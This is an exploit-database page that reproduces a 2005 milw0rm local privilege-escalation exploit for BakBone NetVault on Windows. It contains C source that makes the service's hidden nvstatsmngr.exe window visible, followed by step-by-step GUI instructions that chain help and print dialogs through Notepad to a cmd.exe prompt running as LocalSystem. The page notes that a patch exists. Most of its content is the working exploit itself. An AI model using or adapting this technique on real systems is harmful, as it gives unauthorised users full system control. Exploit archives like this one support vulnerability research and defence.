header-logo
Suggest Exploit
vendor:
NetVault
by:
milw0rm.com
7.2
CVSS
HIGH
Privilege Escalation
N/A
CWE
Product Name: NetVault
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2005

UnhideNetVaultServiceWindow.c

This exploit allows an attacker to gain access to the LocalSystem account by exploiting a vulnerability in the BakBone Software NetVault application. The attacker can use the FindWindow() API to locate the C:Program FilesBakBone SoftwareNetVaultbinnvstatsmngr.exe window, and then use the ShowWindow() API to make the window visible. The attacker can then use the What's This? feature to print a help topic, and then use the View Source feature to open Notepad. The attacker can then open cmd.exe from the system32 directory, which will run under the context of the LocalSystem account.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

// ===== Start UnhideNetVaultServiceWindow.c ======
#include <stdio.h>
#include <windows.h>

int main( void )
{
	HWND hWnd;
	char szWindowName[] = "C:\\Program Files\\BakBone Software\\NetVault\\bin\\nvstatsmngr.exe";

	printf( "Finding window %s\n", szWindowName );

	hWnd = FindWindow( NULL, szWindowName );

	if ( hWnd == NULL )
	{
		printf( "ERROR! Could not find window %s\n", szWindowName );
	
		exit( 1 );
	}

	ShowWindow( hWnd, SW_SHOW );

	return 0;
}
// ===== End UnhideNetVaultServiceWindow.c ======

/*
1. The C:\Program Files\BakBone Software\NetVault\bin\nvstatsmngr.exe window will
   appear. Access the window menu in the upper left and click Properties.

2. Right click on the word Window under the Display Options and click What's This?

3. Right click on the help text that is shown in yellow and click Print Topic.

4. Right click on any printer and click Open.

5. Click Help, Help Topics.

6. Right click in the right side of the help screen and click View Source.

7. Notepad will appear (running under the context of the LocalSystem account).
   Click File, click Open.

8. Change Files of type: to All Files, navigate to the system32 directory and
   locate cmd.exe.  Right click cmd.exe and choose Open.

The result is a command prompt running under the context of the LocalSystem
account.

*/

// milw0rm.com [2005-04-27]

Navigation

Suggest Exploit

Services By CQR